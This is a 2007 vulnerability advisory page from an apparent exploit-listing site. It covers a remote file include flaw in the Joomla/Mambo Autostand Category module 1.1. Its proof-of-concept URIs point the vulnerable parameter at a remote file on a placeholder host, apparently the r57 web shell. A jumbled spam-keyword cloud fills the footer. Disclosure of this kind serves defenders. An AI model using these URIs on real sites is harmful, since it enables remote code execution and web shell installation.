about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla/Mambo Autostand Category Module MosConfig_Absolute_Path Remote File Include Vulnerability


Title Joomla/Mambo Autostand Category Module MosConfig_Absolute_Path Remote File Include Vulnerability
Published 2007-04-14-12:00AM
Updated 2007-04-16-06:21PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cold z3ro is credited with the discovery of this vulnerability.
Vulnerable  Autostand Category Autostand Category 1.1
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.example2.com/r57.txt?
http://www.example.com/modules/mod_as_category.php?mosConfig_absolute_path=http://www.example2.com/r57.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:52:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.diping www.pornsm pc tools s Sax dvd TRISHAINBA gp-123.com Rama ashar www.sex.mo www.ons9.c mySQl popassd zooro www.gengji Saxxy arab dj softwar Sakeela se fast pass Pinkworld. local root kamasutra What are t Microsoft Www.sexwor sexey girl siri Searching 400 naked clip Www.sax.dz Apache/1.3 ngix ieou.cn www.czenyu Crack Data t& www.geotv www.xt89.c Searching black gay www.tyzbw. siri 00280808 2001.315rh madhuri di news for c www.bluefi template-l news for c www.pinkwo www..fotoa